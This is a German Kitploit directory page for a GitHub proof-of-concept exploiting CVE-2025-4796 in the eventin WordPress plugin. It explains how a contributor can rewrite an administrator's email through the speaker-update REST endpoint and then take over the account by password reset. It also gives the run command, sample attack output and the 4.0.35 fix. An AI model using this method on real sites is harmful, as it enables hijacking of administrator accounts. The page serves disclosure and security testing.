Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-4796 — eventin <= 4.0.34 - Privilegieneskalation durch Änderung der Benutzer-E-Mail / Kontoübernahme für authentifizierte Beitragende+ | Kitploit
Tools/GitHubGitHub/anothersec/cve-2025-4796
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubanothersec/cve-2025-4796

CVE-2025-4796

eventin <= 4.0.34 - Privilegieneskalation durch Änderung der Benutzer-E-Mail / Kontoübernahme für authentifizierte Beitragende+

Repository anzeigen
1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-4796

eventin <= 4.0.34 - Privilegieneskalation durch Änderung der Benutzer-E-Mail / Kontoübernahme für authentifizierte Beitragende und höher

Beschreibung

Ein Privilegieneskalationsfehler im eventin WordPress-Plugin (<= 4.0.34) ermöglicht es jedem Beitragenden oder höher berechtigten Benutzer, die E-Mail eines beliebigen Benutzers über die Speaker-Update-API des Plugins zu ändern. Indem die E-Mail eines Administrators auf eine vom Angreifer kontrollierte E-Mail geändert wird, kann dieser das Passwort zurücksetzen und das Konto übernehmen.

  • Angreifbarer Teil: eventin WordPress-Plugin (eventin\speaker\api\speakercontroller::update_item)
  • Betroffene Versionen: <= 4.0.34
  • CVE: CVE-2025-4796
  • CVSS: 8.8 (hoch)

Schwachstellendetails

eventin überprüft nicht richtig, wer die Aktualisierung anfordert oder ob der Benutzer die E-Mail ändern darf. Ein Beitragender oder höher kann diesen Endpunkt aufrufen:

  • put /wp-json/eventin/v2/speakers/<speaker_id> und die Speaker-E-Mail auf eine von ihnen kontrollierte E-Mail ändern. Dann kann der Angreifer die WordPress-Passwortzurücksetzung verwenden, um das Administratorkonto zu übernehmen.

Anforderungen:

  • python 3.8 oder höher
  • requests

Installiere requests: pip install requests

Verwendung

Führe das Skript aus und gib die erforderlichen Werte ein, wenn du dazu aufgefordert wirst:

python3 CVE-2025-4796.py

Beispielausgabe

[+] Deaktiviere SSL-Verifizierungswarnungen
[+] Anmeldung bei WordPress.
[+] Anmeldung erfolgreich.
[+] Abrufen des Nonce-Tokens
[+] Nonce-Token gefunden: abcdef1234567890
[+] Aktualisierungsanfrage für Speaker-E-Mail

[+] Aktualisierungsvorgang erfolgreich.

root@kitploit:~
url: http://example.com  
id: 123   
email: [email protected]. 
user: attacker  
pass: yourpassword  

{. 
  "id": 123,    
  "email": "[email protected]",  
  "name": "Speaker Name",    
  ...  
}. 

Abhilfe

Ein Patch wurde in Version 4.0.35 des eventin-Plugins veröffentlicht. Website-Administratoren wird dringend empfohlen, sofort auf diese Version zu aktualisieren. Der Fix enthält zusätzliche Benutzerüberprüfungen in der Funktion SpeakerController::update_item.

Tool herunterladen